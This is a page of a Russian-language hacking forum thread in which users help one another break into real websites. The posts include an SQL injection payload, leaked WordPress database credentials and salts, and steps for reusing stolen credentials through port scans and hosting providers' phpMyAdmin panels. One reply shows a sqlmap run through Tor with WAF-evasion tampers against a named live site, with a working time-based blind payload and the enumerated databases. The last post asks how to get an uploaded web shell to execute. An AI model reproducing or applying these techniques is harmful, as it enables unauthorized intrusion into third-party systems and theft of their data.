HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #2871  
Старый 04.11.2020, 22:57
crlf
Guest
Сообщений: n/a
Провел на форуме:
169212

Репутация: 441
По умолчанию

Цитата:
Сообщение от Forserer  
Forserer said:

Попытался просто видоизменить конец запроса, но комментарий -- # /* не отрабатывает
тоже вываливается в ошибку
На скрине видна ошибка только в случае многострочного комментария, который должен быть закрыт по спецификации синтаксиса.

Цитата:
Сообщение от Forserer  
Forserer said:

Возможно ли как то провести sql иньекцию?
Не вижу проблем, почему нельзя использовать lastnameещё раз и просто вклиниться в запрос не прибегая к комментированию, примерно таким образом:

Код:
Code:
xxx', lastname = @@version, firstname = 'xxx
При этом превое значение lastname должно быть проигнорировано.

Цитата:
Сообщение от Forserer  
Forserer said:

так, а как доработать вот такой запрос для получения какой либо инфы через UNION
Маны по MySQLi вам в помощь:

//threads/43966/

https://rdot.org/forum/showthread.php?t=124

https://rdot.org/forum/showthread.php?t=60

Не стоит брезговать, по причине давних дат публикации материалов, с тех времён кардинально ничего не поменялось. В случае непоняток, всегда можно уточнить здесь, а не просить раскручивать за ваc простейшие инъекции в запросах выборки.
 
Ответить с цитированием

  #2872  
Старый 05.11.2020, 16:25
Forserer
Guest
Сообщений: n/a
Провел на форуме:
12287

Репутация: 0
По умолчанию

Цитата:
Сообщение от Forserer  
Forserer said:

так, а как доработать вот такой запрос для получения какой либо инфы через UNION
Код:
Code:
SELECT h.* From oc_help h LEFT JOIN `oc_help_to_blog` htb USING (help_id) WHERE htb.blog_id = 4612
В таком запросе получилось только через ошибку вывести данные, прямого вывода на страницу нету видимо, но в таком запросе не получится сделать через ошибку INSERT или UPDATE ?

Такой вариант не работает. База 10.3.9-MariaDB

Код:
Code:
SELECT h.* From oc_help h LEFT JOIN `oc_help_to_blog` htb USING (help_id) WHERE htb.blog_id = 4612; UPDATE ...
 
Ответить с цитированием

  #2873  
Старый 13.01.2021, 18:36
anton liga
Guest
Сообщений: n/a
Провел на форуме:
8898

Репутация: 0
По умолчанию

Парни,привет! есть вот такая инфа,подскажите пожалуйста и если можно,то прям тыкните носом в строчки,что можно с этим сделать?

если я правильно понимаю,то это ключи от БД логином и паролем..как это можно использовать и через какие проги..у меня на уме только бурп..

.SpoilerTarget" type="button">Spoiler: данные
nRe]EhlT[');

define('LOGGED_IN_KEY', '?@]WrjTLAChQ}ndj}r%6ry`9{>naV,`%`&9!Lm{}wa@PY^Y=f@)QE xv1mM]X6Lkk');

define('NONCE_KEY', 'J$+y?FTAc@D6)?w j!(cy&Uw|A!((@?gz^ xj{9jLlI3X-p*J!-1)Qc$h/fxhR>N');

define('AUTH_SALT', 'uc8K{*v$8{V?}hqlwjbJabr+ cYSv[N=wU0qooX]QdG^R?BTL{xSU&WD+oefQ:K;');

define('SECURE_AUTH_SALT', 'Hi+|oN@oSZ*n}O4L-bB&pr:5 ;$;HjMX!RQf}Vv*1J R|5e~-SKjINvPbbL#q6D,');

define('LOGGED_IN_SALT', '4pQD.YnB~dbh-vC4xW}.L@`Km_{uC+
 
Ответить с цитированием

  #2874  
Старый 13.01.2021, 18:46
aberkroft
Guest
Сообщений: n/a
Провел на форуме:
14421

Репутация: 3
По умолчанию

Любым mysql-клиентом к базе подключиться, однако сдается мне, что mysql-сервер слушает только на localhost, а доступа к этому самому localhost Вы не имеете.
 
Ответить с цитированием

  #2875  
Старый 13.01.2021, 21:33
d_dwacawaca
Guest
Сообщений: n/a
Провел на форуме:
7581

Репутация: 0
По умолчанию

[QUOTE="anton liga"]
anton liga said:

Парни,привет! есть вот такая инфа,подскажите пожалуйста и если можно,то прям тыкните носом в строчки,что можно с этим сделать?
если я правильно понимаю,то это ключи от БД логином и паролем..как это можно использовать и через какие проги..у меня на уме только бурп..
Spoiler: данные
nRe]EhlT[');
define('LOGGED_IN_KEY', '?@]WrjTLAChQ}ndj}r%6ry`9{>naV,`%`&9!Lm{}wa@PY^Y=f@)QE xv1mM]X6Lkk');
define('NONCE_KEY', 'J$+y?FTAc@D6)?w j!(cy&Uw|A!((@?gz^ xj{9jLlI3X-p*J!-1)Qc$h/fxhR>N');
define('AUTH_SALT', 'uc8K{*v$8{V?}hqlwjbJabr+ cYSv[N=wU0qooX]QdG^R?BTL{xSU&WD+oefQ:K;');
define('SECURE_AUTH_SALT', 'Hi+|oN@oSZ*n}O4L-bB&pr:5 ;$;HjMX!RQf}Vv*1J R|5e~-SKjINvPbbL#q6D,');
define('LOGGED_IN_SALT', '4pQD.YnB~dbh-vC4xW}.L@`Km_{uC+nRe]EhlT[');
define('LOGGED_IN_KEY', '?@]WrjTLAChQ}ndj}r%6ry`9{>naV,`%`&9!Lm{}wa@PY^Y=f@)QE xv1mM]X6Lkk');
define('NONCE_KEY', 'J$+y?FTAc@D6)?w j!(cy&Uw|A!((@?gz^ xj{9jLlI3X-p*J!-1)Qc$h/fxhR>N');
define('AUTH_SALT', 'uc8K{*v$8{V?}hqlwjbJabr+ cYSv[N=wU0qooX]QdG^R?BTL{xSU&WD+oefQ:K;');
define('SECURE_AUTH_SALT', 'Hi+|oN@oSZ*n}O4L-bB&pr:5 ;$;HjMX!RQf}Vv*1J R|5e~-SKjINvPbbL#q6D,');
define('LOGGED_IN_SALT', '4pQD.YnB~dbh-vC4xW}.L@`Km_{uC+
 
Ответить с цитированием

  #2876  
Старый 19.01.2021, 03:44
lifescore
Guest
Сообщений: n/a
Провел на форуме:
213865

Репутация: 72
По умолчанию

Цитата:
Сообщение от anton liga  
anton liga said:

Парни,привет! есть вот такая инфа,подскажите пожалуйста и если можно,то прям тыкните носом в строчки,что можно с этим сделать?
если я правильно понимаю,то это ключи от БД логином и паролем..как это можно использовать и через какие проги..у меня на уме только бурп..
Spoiler: данные
define('DB_NAME', 'rtik_wke58w5ehjrkew5u');
/** MySQL database username */
define('DB_USER', 'rtik_cucok507');
/** MySQL database password */
define('DB_PASSWORD', 'dkjfy538i235rkewnfkwe57j56');
/** MySQL hostname */
define('DB_HOST', 'localhost');
Этим данным уже лет 7+

.SpoilerTarget" type="button">Spoiler: 2015
gerkatinsolo.or.id/wp-content/uploads/fgallery/config/

file60 источник
 
Ответить с цитированием

  #2877  
Старый 19.01.2021, 04:02
lifescore
Guest
Сообщений: n/a
Провел на форуме:
213865

Репутация: 72
По умолчанию

Если db_host = localhost

Проверяем интересуемые порт(ы) служб на доступность + возможность коннекта

Код:
Code:
sudo nmap -v -v -sS -Pn -p3306 0.0.0.0
Если порты закрыты или ограничены для подключения, отправляемся на поиске панельки.

В 90% залетаем на ура, если имеем актуальные кредсы и панельку управления СУБД.

Ищем директории phpmyadmin/pma/phpadmin, adminer.php и так далее в разных вариациях.

Экономим время путем установки хостера и дефолт путей/конфигов данных хостеров:

.SpoilerTarget" type="button">Spoiler: default_host

Код:
Code:
Хостинг-провайдер    Значение DB_HOST
1and1            db12345678
AN Hosting        localhost
A Small Orange        localhost
BlueHost        localhost
DreamHost        mysql.example.com
GoDaddy            h41mysql52.secureserver.net
HostGator        localhost
HostICan        localhost
ICDSoft            localhost:/tmp/mysql5.sock
LaughingSquid        localhost
MediaTemple/Grid    internal-db.s44441.gridserver.com
one.com            localhost
pair Networks        dbnnnx.pair.com
Rackspace Cloud        mysql50-01.wc1.dfw1.stabletransit.com
Yahoo            mysql
Сервера с cPanel    localhost
Сервера с Plesk        localhost
Сервера с DirectAdmin    localhost
Tophost.it        sql.your-domain-name.it
Sprinthost.ru        localhost
.SpoilerTarget" type="button">Spoiler: Public PMA links
// Зависит от сервера размещен сайт:

beget.com https://dock2.beget.com/phpMyAdmin https://digger.beget.com/phpMyAdmin

hc.ru https://phpmyadmin.hc.ru

ihc.ru https://myadmin.ihc.ru/

jino.ru https://myadmin.jino.ru

masterhost.ru https://phpmyadmin.masterhost.ru

reg.ru https://serverXX.hosting.reg.ru/phpmyadmin/

sprinthost.ru https://pma.sprinthost.ru/index.php

nic.ru https://pma.nic.ru

TimeWeb https://servername.timeweb.ru/pma/, где servername - имя сервера

TimeWeb https://pulcher.timeweb.ru/pma https://cronus.timeweb.ru/pma https://betsy.timeweb.ru/pma
 
Ответить с цитированием

  #2878  
Старый 03.02.2021, 15:23
DezMond™
Участник форума
Регистрация: 10.01.2008
Сообщений: 199
Провел на форуме:
961428

Репутация: 662
Отправить сообщение для DezMond™ с помощью ICQ
По умолчанию

Help

Код:
Code:
https://www.castagniccia-maremonti.com/index.php?id=26+order+by+7+--+&type_page=detail_affaires
 
Ответить с цитированием

  #2879  
Старый 05.02.2021, 11:51
winstrool
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875

Репутация: 137
По умолчанию

Цитата:
Сообщение от DezMond™  
DezMond™ said:

Help
Код:
Code:
https://www.castagniccia-maremonti.com/index.php?id=26+order+by+7+--+&type_page=detail_affaires
Цитата:
Сообщение от None  
sqlmap --url="
https://www.castagniccia-maremonti.c...etail_affaires
" --random-agent --tor --tor-port=9150 --tor-type=SOCKS5 --threads=10 --dbms=Mysql --tamper="between,randomcase,space2comment" --keep-alive waf --dbs --batch
......
---
Parameter: #1* (URI)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload:
https://www.castagniccia-maremonti.c...ndex.php?id=26
' AND (SELECT 9803 FROM (SELECT(SLEEP(10)))QnOf) AND 'SbQB'='SbQB&type_page=detail_affaires
---
......
available databases [2]:[*] `otcmm-taxesejour`[*] information_schema
 
Ответить с цитированием

  #2880  
Старый 05.02.2021, 15:43
polzunki
Guest
Сообщений: n/a
Провел на форуме:
7210

Репутация: 0
По умолчанию

Доброго времени всем. Подскажите пожалуйста по не скольким вопросам. Есть сайт. Из админки есть возможность делать импорт в базу данных.

Возможно ли как-то получить шелл? Пути не известны.

Так же есть возможность загружать файлы, но в чистом виде .php файл грузиться не хочет.

Переименовав к примеру в .php3 загрузка происходит. С добавлением рандомного имени в конце.

Пример: wso.php3.53aadaa50075c72420b8656f14b0b68c

При переходе по ссылке, шелл не отображается, а происходит скачивание.

С этим можно что-то сделать? Заранее благодарен.
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ